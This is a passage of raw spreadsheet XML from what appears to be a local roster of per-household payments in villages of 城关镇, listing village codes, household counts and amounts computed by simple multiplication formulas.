        <v>233</v>
      </c>
      <c r="G343" s="17">
        <v>1</v>
      </c>
      <c r="H343" s="18">
        <v>365</v>
      </c>
      <c r="I343" s="17">
        <f t="shared" ref="I343:I352" si="13">H343*G343</f>
        <v>365</v>
      </c>
      <c r="J343" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K343" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="344" customHeight="1" spans="1:11">
      <c r="A344" s="16" t="s">
        <v>1053</v>
      </c>
      <c r="B344" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C344" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D344" s="17" t="s">
        <v>1054</v>
      </c>
      <c r="E344" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F344" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G344" s="17">
        <v>1</v>
      </c>
      <c r="H344" s="18">
        <v>365</v>
      </c>
      <c r="I344" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J344" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K344" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="345" customHeight="1" spans="1:11">
      <c r="A345" s="16" t="s">
        <v>1055</v>
      </c>
      <c r="B345" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C345" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D345" s="17" t="s">
        <v>1056</v>
      </c>
      <c r="E345" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F345" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G345" s="17">
        <v>1</v>
      </c>
      <c r="H345" s="18">
        <v>365</v>
      </c>
      <c r="I345" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J345" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K345" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="346" customHeight="1" spans="1:11">
      <c r="A346" s="16" t="s">
        <v>1057</v>
      </c>
      <c r="B346" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C346" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D346" s="17" t="s">
        <v>840</v>
      </c>
      <c r="E346" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F346" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G346" s="17">
        <v>1</v>
      </c>
      <c r="H346" s="18">
        <v>365</v>
      </c>
      <c r="I346" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J346" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K346" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="347" customHeight="1" spans="1:11">
      <c r="A347" s="16" t="s">
        <v>1058</v>
      </c>
      <c r="B347" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C347" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D347" s="17" t="s">
        <v>977</v>
      </c>
      <c r="E347" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F347" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G347" s="17">
        <v>1</v>
      </c>
      <c r="H347" s="18">
        <v>365</v>
      </c>
      <c r="I347" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J347" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K347" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="348" customHeight="1" spans="1:11">
      <c r="A348" s="16" t="s">
        <v>1059</v>
      </c>
      <c r="B348" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C348" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D348" s="17" t="s">
        <v>1060</v>
      </c>
      <c r="E348" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F348" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G348" s="17">
        <v>1</v>
      </c>
      <c r="H348" s="18">
        <v>365</v>
      </c>
      <c r="I348" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J348" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K348" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="349" customHeight="1" spans="1:11">
      <c r="A349" s="16" t="s">
        <v>1061</v>
      </c>
      <c r="B349" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C349" s="17" t="s">
        <v>643</v>
      </c>
      <c r="D349" s="17" t="s">
        <v>1062</v>
      </c>
      <c r="E349" s="17" t="s">
        <v>1063</v>
      </c>
      <c r="F349" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G349" s="17">
        <v>1</v>
      </c>
      <c r="H349" s="18">
        <v>365</v>
      </c>
      <c r="I349" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J349" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K349" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="350" customHeight="1" spans="1:11">
      <c r="A350" s="16" t="s">
        <v>1064</v>
      </c>
      <c r="B350" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C350" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D350" s="17" t="s">
        <v>1065</v>
      </c>
      <c r="E350" s="17" t="s">
        <v>1066</v>
      </c>
      <c r="F350" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G350" s="17">
        <v>1</v>
      </c>
      <c r="H350" s="18">
        <v>365</v>
      </c>
      <c r="I350" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J350" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K350" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="351" customHeight="1" spans="1:11">
      <c r="A351" s="16" t="s">
        <v>1067</v>
      </c>
      <c r="B351" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C351" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D351" s="17" t="s">
        <v>1068</v>
      </c>
      <c r="E351" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F351" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G351" s="17">
        <v>1</v>
      </c>
      <c r="H351" s="18">
        <v>365</v>
      </c>
      <c r="I351" s="17">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J351" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K351" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="352" customHeight="1" spans="1:11">
      <c r="A352" s="16" t="s">
        <v>1069</v>
      </c>
      <c r="B352" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C352" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D352" s="17" t="s">
        <v>1070</v>
      </c>
      <c r="E352" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F352" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G352" s="17">
        <v>2</v>
      </c>
      <c r="H352" s="18">
        <v>325</v>
      </c>
      <c r="I352" s="17">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J352" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K352" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="353" customHeight="1" spans="1:11">
      <c r="A353" s="16" t="s">
        <v>1071</v>
      </c>
      <c r="B353" s="17" t="str">
        <f>B352</f>
        <v>城关镇</v>
      </c>
      <c r="C353" s="17" t="str">
        <f>C352</f>
        <v>中华村</v>
      </c>
      <c r="D353" s="16" t="s">
        <v>1072</v>
      </c>
      <c r="E353" s="16" t="s">
        <v>320</v>
      </c>
      <c r="F353" s="17" t="str">
        <f>F352</f>
        <v>4113210108</v>
      </c>
      <c r="G353" s="17"/>
      <c r="H353" s="17"/>
      <c r="I353" s="17"/>
      <c r="J353" s="17"/>
      <c r="K353" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="354" customHeight="1" spans="1:11">
      <c r="A354" s="16" t="s">
        <v>1073</v>
      </c>
      <c r="B354" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C354" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D354" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="E354" s="17" t="s">
        <v>402</v>
      </c>
      <c r="F354" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G354" s="17">
        <v>1</v>
      </c>
      <c r="H354" s="18">
        <v>365</v>
      </c>
      <c r="I354" s="17">
        <f>H354*G354</f>
        <v>365</v>
      </c>
      <c r="J354" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K354" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="355" customHeight="1" spans="1:11">
      <c r="A355" s="16" t="s">
        <v>1075</v>
      </c>
      <c r="B355" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C355" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D355" s="17" t="s">
        <v>1076</v>
      </c>
      <c r="E355" s="17" t="s">
        <v>1077</v>
      </c>
      <c r="F355" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G355" s="17">
        <v>1</v>
      </c>
      <c r="H355" s="18">
        <v>365</v>
      </c>
      <c r="I355" s="17">
        <f>H355*G355</f>
        <v>365</v>
      </c>
      <c r="J355" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K355" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="356" customHeight="1" spans="1:11">
      <c r="A356" s="16" t="s">
        <v>1078</v>
      </c>
      <c r="B356" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C356" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D356" s="17" t="s">
        <v>1079</v>
      </c>
      <c r="E356" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F356" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G356" s="17">
        <v>3</v>
      </c>
      <c r="H356" s="18">
        <v>315</v>
      </c>
      <c r="I356" s="17">
        <f>H356*G356</f>
        <v>945</v>
      </c>
      <c r="J356" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K356" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="357" customHeight="1" spans="1:11">
      <c r="A357" s="16" t="s">
        <v>1080</v>
      </c>
      <c r="B357" s="17" t="str">
        <f>B356</f>
        <v>城关镇</v>
      </c>
      <c r="C357" s="17" t="str">
        <f>C356</f>
        <v>北外村</v>
      </c>
      <c r="D357" s="16" t="s">
        <v>1081</v>
      </c>
      <c r="E357" s="16" t="s">
        <v>273</v>
      </c>
      <c r="F357" s="17" t="str">
        <f>F356</f>
        <v>4113210102</v>
      </c>
      <c r="G357" s="17"/>
      <c r="H357" s="17"/>
      <c r="I357" s="17"/>
      <c r="J357" s="17"/>
      <c r="K357" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="358" customHeight="1" spans="1:11">
      <c r="A358" s="16" t="s">
        <v>1082</v>
      </c>
      <c r="B358" s="17" t="str">
        <f>B357</f>
        <v>城关镇</v>
      </c>
      <c r="C358" s="17" t="str">
        <f>C357</f>
        <v>北外村</v>
      </c>
      <c r="D358" s="23" t="s">
        <v>1083</v>
      </c>
      <c r="E358" s="23" t="s">
        <v>1084</v>
      </c>
      <c r="F358" s="17" t="str">
        <f>F357</f>
        <v>4113210102</v>
      </c>
      <c r="G358" s="17"/>
      <c r="H358" s="17"/>
      <c r="I358" s="17"/>
      <c r="J358" s="17"/>
      <c r="K358" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="359" customHeight="1" spans="1:11">
      <c r="A359" s="16" t="s">
        <v>1085</v>
      </c>
      <c r="B359" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C359" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D359" s="17" t="s">
        <v>1086</v>
      </c>
      <c r="E359" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F359" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G359" s="17">
        <v>1</v>
      </c>
      <c r="H359" s="18">
        <v>365</v>
      </c>
      <c r="I359" s="17">
        <f>H359*G359</f>
        <v>365</v>
      </c>
      <c r="J359" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K359" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="360" customHeight="1" spans="1:11">
      <c r="A360" s="16" t="s">
        <v>1087</v>
      </c>
      <c r="B360" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C360" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D360" s="17" t="s">
        <v>1088</v>
      </c>
      <c r="E360" s="17" t="s">
        <v>910</v>
      </c>
      <c r="F360" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G360" s="17">
        <v>2</v>
      </c>
      <c r="H360" s="18">
        <v>325</v>
      </c>
      <c r="I360" s="17">
        <f>H360*G360</f>
        <v>650</v>
      </c>
      <c r="J360" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K360" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="361" customHeight="1" spans="1:11">
      <c r="A361" s="16" t="s">
        <v>1089</v>
      </c>
      <c r="B361" s="17" t="str">
        <f>B360</f>
        <v>城关镇</v>
      </c>
      <c r="C361" s="17" t="str">
        <f>C360</f>
        <v>西北村</v>
      </c>
      <c r="D361" s="16" t="s">
        <v>1090</v>
      </c>
      <c r="E361" s="16" t="s">
        <v>1091</v>
      </c>
      <c r="F361" s="17" t="str">
        <f>F360</f>
        <v>4113210106</v>
      </c>
      <c r="G361" s="17"/>
      <c r="H361" s="17"/>
      <c r="I361" s="17"/>
      <c r="J361" s="17"/>
      <c r="K361" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="362" customHeight="1" spans="1:11">
      <c r="A362" s="16" t="s">
        <v>1092</v>
      </c>
      <c r="B362" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C362" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D362" s="17" t="s">
        <v>1093</v>
      </c>
      <c r="E362" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F362" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G362" s="17">
        <v>1</v>
      </c>
      <c r="H362" s="18">
        <v>365</v>
      </c>
      <c r="I362" s="17">
        <f>H362*G362</f>
        <v>365</v>
      </c>
      <c r="J362" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K362" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="363" customHeight="1" spans="1:11">
      <c r="A363" s="16" t="s">
        <v>1094</v>
      </c>
      <c r="B363" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C363" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D363" s="17" t="s">
        <v>1095</v>
      </c>
      <c r="E363" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F363" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G363" s="17">
        <v>1</v>
      </c>
      <c r="H363" s="18">
        <v>365</v>
      </c>
      <c r="I363" s="17">
        <f>H363*G363</f>
        <v>365</v>
      </c>
      <c r="J363" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K363" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="364" customHeight="1" spans="1:11">
      <c r="A364" s="16" t="s">
        <v>1096</v>
      </c>
      <c r="B364" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C364" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D364" s="17" t="s">
        <v>1097</v>
      </c>
      <c r="E364" s="17" t="s">
        <v>1098</v>
      </c>
      <c r="F364" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G364" s="17">
        <v>2</v>
      </c>
      <c r="H364" s="18">
        <v>325</v>
      </c>
      <c r="I364" s="17">
        <f>H364*G364</f>
        <v>650</v>
      </c>
      <c r="J364" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K364" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="365" customHeight="1" spans="1:11">
      <c r="A365" s="16" t="s">
        <v>1099</v>
      </c>
      <c r="B365" s="17" t="str">
        <f>B364</f>
        <v>城关镇</v>
      </c>
      <c r="C365" s="17" t="str">
        <f>C364</f>
        <v>中华村</v>
      </c>
      <c r="D365" s="16" t="s">
        <v>1100</v>
      </c>
      <c r="E365" s="16" t="s">
        <v>1101</v>
      </c>
      <c r="F365" s="17" t="str">
        <f>F364</f>
        <v>4113210108</v>
      </c>
      <c r="G365" s="17"/>
      <c r="H365" s="17"/>
      <c r="I365" s="17"/>
      <c r="J365" s="17"/>
      <c r="K365" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="366" customHeight="1" spans="1:11">
      <c r="A366" s="16" t="s">
        <v>1102</v>
      </c>
      <c r="B366" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C366" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D366" s="17" t="s">
        <v>1103</v>
      </c>
      <c r="E366" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F366" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G366" s="17">
        <v>1</v>
      </c>
      <c r="H366" s="18">
        <v>365</v>
      </c>
      <c r="I366" s="17">
        <f>H366*G366</f>
        <v>365</v>
      </c>
      <c r="J366" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K366" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="367" customHeight="1" spans="1:11">
      <c r="A367" s="16" t="s">
        <v>1104</v>
      </c>
      <c r="B367" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C367" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D367" s="17" t="s">
        <v>1105</v>
      </c>
      <c r="E367" s="17" t="s">
        <v>276</v>
      </c>
      <c r="F367" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G367" s="17">
        <v>2</v>
      </c>
      <c r="H367" s="18">
        <v>325</v>
      </c>
      <c r="I367" s="17">
        <f>H367*G367</f>
        <v>650</v>
      </c>
      <c r="J367" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K367" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="368" customHeight="1" spans="1:11">
      <c r="A368" s="16" t="s">
        <v>1106</v>
      </c>
      <c r="B368" s="17" t="str">
        <f>B367</f>
        <v>城关镇</v>
      </c>
      <c r="C368" s="17" t="str">
        <f>C367</f>
        <v>中华村</v>
      </c>
      <c r="D368" s="16" t="s">
        <v>1107</v>
      </c>
      <c r="E368" s="16" t="s">
        <v>1108</v>
      </c>
      <c r="F368" s="17" t="str">
        <f>F367</f>
        <v>4113210108</v>
      </c>
      <c r="G368" s="17"/>
      <c r="H368" s="17"/>
      <c r="I368" s="17"/>
      <c r="J368" s="17"/>
      <c r="K368" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="369" customHeight="1" spans="1:11">
      <c r="A369" s="16" t="s">
        <v>1109</v>
      </c>
      <c r="B369" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C369" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D369" s="17" t="s">
        <v>1110</v>
      </c>
      <c r="E369" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F369" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G369" s="17">
        <v>2</v>
      </c>
      <c r="H369" s="18">
        <v>325</v>
      </c>
      <c r="I369" s="17">
        <f>H369*G369</f>
        <v>650</v>
      </c>
      <c r="J369" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K369" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="370" customHeight="1" spans="1:11">
      <c r="A370" s="16" t="s">
        <v>1111</v>
      </c>
      <c r="B370" s="17" t="str">
        <f>B369</f>
        <v>城关镇</v>
      </c>
      <c r="C370" s="17" t="str">
        <f>C369</f>
        <v>北外村</v>
      </c>
      <c r="D370" s="16" t="s">
        <v>1112</v>
      </c>
      <c r="E370" s="16" t="s">
        <v>249</v>
      </c>
      <c r="F370" s="17" t="str">
        <f>F369</f>
        <v>4113210102</v>
      </c>
      <c r="G370" s="17"/>
      <c r="H370" s="17"/>
      <c r="I370" s="17"/>
      <c r="J370" s="17"/>
      <c r="K370" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="371" customHeight="1" spans="1:11">
      <c r="A371" s="16" t="s">
        <v>1113</v>
      </c>
      <c r="B371" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C371" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D371" s="17" t="s">
        <v>1114</v>
      </c>
      <c r="E371" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F371" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G371" s="17">
        <v>1</v>
      </c>
      <c r="H371" s="18">
        <v>365</v>
      </c>
      <c r="I371" s="17">
        <f>H371*G371</f>
        <v>365</v>
      </c>
      <c r="J371" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K371" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="372" customHeight="1" spans="1:11">
      <c r="A372" s="16" t="s">
        <v>1115</v>
      </c>
      <c r="B372" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C372" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D372" s="17" t="s">
        <v>1116</v>
      </c>
      <c r="E372" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F372" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G372" s="17">
        <v>1</v>
      </c>
      <c r="H372" s="18">
        <v>365</v>
      </c>
      <c r="I372" s="17">
        <f>H372*G372</f>
        <v>365</v>
      </c>
      <c r="J372" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K372" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="373" customHeight="1" spans="1:11">
      <c r="A373" s="16" t="s">
        <v>1117</v>
      </c>
      <c r="B373" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C373" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D373" s="17" t="s">
        <v>1118</v>
      </c>
      <c r="E373" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F373" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G373" s="17">
        <v>2</v>
      </c>
      <c r="H373" s="18">
        <v>325</v>
      </c>
      <c r="I373" s="17">
        <f>H373*G373</f>
        <v>650</v>
      </c>
      <c r="J373" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K373" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="374" customHeight="1" spans="1:11">
      <c r="A374" s="16" t="s">
        <v>1119</v>
      </c>
      <c r="B374" s="17" t="str">
        <f>B373</f>
        <v>城关镇</v>
      </c>
      <c r="C374" s="17" t="str">
        <f>C373</f>
        <v>西北村</v>
      </c>
      <c r="D374" s="16" t="s">
        <v>1120</v>
      </c>
      <c r="E374" s="16" t="s">
        <v>488</v>
      </c>
      <c r="F374" s="17" t="str">
        <f>F373</f>
        <v>4113210106</v>
      </c>
      <c r="G374" s="17"/>
      <c r="H374" s="17"/>
      <c r="I374" s="17"/>
      <c r="J374" s="17"/>
      <c r="K374" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="375" customHeight="1" spans="1:11">
      <c r="A375" s="16" t="s">
        <v>1121</v>
      </c>
      <c r="B375" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C375" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D375" s="17" t="s">
        <v>1122</v>
      </c>
      <c r="E375" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F375" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G375" s="17">
        <v>1</v>
      </c>
      <c r="H375" s="18">
        <v>365</v>
      </c>
      <c r="I375" s="17">
        <f>H375*G375</f>
        <v>365</v>
      </c>
      <c r="J375" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K375" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="376" customHeight="1" spans="1:11">
      <c r="A376" s="16" t="s">
        <v>1123</v>
      </c>
      <c r="B376" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C376" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D376" s="17" t="s">
        <v>1124</v>
      </c>
      <c r="E376" s="17" t="s">
        <v>1125</v>
      </c>
      <c r="F376" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G376" s="17">
        <v>2</v>
      </c>
      <c r="H376" s="18">
        <v>325</v>
      </c>
      <c r="I376" s="17">
        <f>H376*G376</f>
        <v>650</v>
      </c>
      <c r="J376" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K376" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="377" customHeight="1" spans="1:11">
      <c r="A377" s="16" t="s">
        <v>1126</v>
      </c>
      <c r="B377" s="17" t="str">
        <f>B376</f>
        <v>城关镇</v>
      </c>
      <c r="C377" s="17" t="str">
        <f>C376</f>
        <v>东北村</v>
      </c>
      <c r="D377" s="16" t="s">
        <v>1127</v>
      </c>
      <c r="E377" s="16" t="s">
        <v>435</v>
      </c>
      <c r="F377" s="17" t="str">
        <f>F376</f>
        <v>4113210103</v>
      </c>
      <c r="G377" s="17"/>
      <c r="H377" s="17"/>
      <c r="I377" s="17"/>
      <c r="J377" s="17"/>
      <c r="K377" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="378" customHeight="1" spans="1:11">
      <c r="A378" s="16" t="s">
        <v>1128</v>
      </c>
      <c r="B378" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C378" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D378" s="17" t="s">
        <v>1129</v>
      </c>
      <c r="E378" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F378" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G378" s="17">
        <v>2</v>
      </c>
      <c r="H378" s="18">
        <v>325</v>
      </c>
      <c r="I378" s="17">
        <f>H378*G378</f>
        <v>650</v>
      </c>
      <c r="J378" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K378" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="379" customHeight="1" spans="1:11">
      <c r="A379" s="16" t="s">
        <v>1130</v>
      </c>
      <c r="B379" s="17" t="str">
        <f>B378</f>
        <v>城关镇</v>
      </c>
      <c r="C379" s="17" t="str">
        <f>C378</f>
        <v>北外村</v>
      </c>
      <c r="D379" s="19" t="s">
        <v>1131</v>
      </c>
      <c r="E379" s="19" t="s">
        <v>1132</v>
      </c>
      <c r="F379" s="17" t="str">
        <f>F378</f>
        <v>4113210102</v>
      </c>
      <c r="G379" s="17"/>
      <c r="H379" s="17"/>
      <c r="I379" s="17"/>
      <c r="J379" s="17"/>
      <c r="K379" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="380" customHeight="1" spans="1:11">
      <c r="A380" s="16" t="s">
        <v>1133</v>
      </c>
      <c r="B380" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C380" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D380" s="17" t="s">
        <v>1134</v>
      </c>
      <c r="E380" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F380" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G380" s="17">
        <v>1</v>
      </c>
      <c r="H380" s="18">
        <v>365</v>
      </c>
      <c r="I380" s="17">
        <f>H380*G380</f>
        <v>365</v>
      </c>
      <c r="J380" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K380" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="381" customHeight="1" spans="1:11">
      <c r="A381" s="16" t="s">
        <v>1135</v>
      </c>
      <c r="B381" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C381" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D381" s="17" t="s">
        <v>1136</v>
      </c>
      <c r="E381" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F381" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G381" s="17">
        <v>1</v>
      </c>
      <c r="H381" s="18">
        <v>365</v>
      </c>
      <c r="I381" s="17">
        <f>H381*G381</f>
        <v>365</v>
      </c>
      <c r="J381" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K381" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="382" customHeight="1" spans="1:11">
      <c r="A382" s="16" t="s">
        <v>1137</v>
      </c>
      <c r="B382" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C382" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D382" s="17" t="s">
        <v>1138</v>
      </c>
      <c r="E382" s="17" t="s">
        <v>1139</v>
      </c>
      <c r="F382" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G382" s="17">
        <v>1</v>
      </c>
      <c r="H382" s="18">
        <v>365</v>
      </c>
      <c r="I382" s="17">
        <f>H382*G382</f>
        <v>365</v>
      </c>
      <c r="J382" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K382" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="383" customHeight="1" spans="1:11">
      <c r="A383" s="16" t="s">
        <v>1140</v>
      </c>
      <c r="B383" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C383" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D383" s="17" t="s">
        <v>1141</v>
      </c>
      <c r="E383" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F383" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G383" s="17">
        <v>1</v>
      </c>
      <c r="H383" s="18">
        <v>365</v>
      </c>
      <c r="I383" s="17">
        <f>H383*G383</f>
        <v>365</v>
      </c>
      <c r="J383" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K383" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="384" customHeight="1" spans="1:11">
      <c r="A384" s="16" t="s">
        <v>1142</v>
      </c>
      <c r="B384" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C384" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D384" s="17" t="s">
        <v>1143</v>
      </c>
      <c r="E384" s="17" t="s">
        <v>1144</v>
      </c>
      <c r="F384" s="17" t="s">
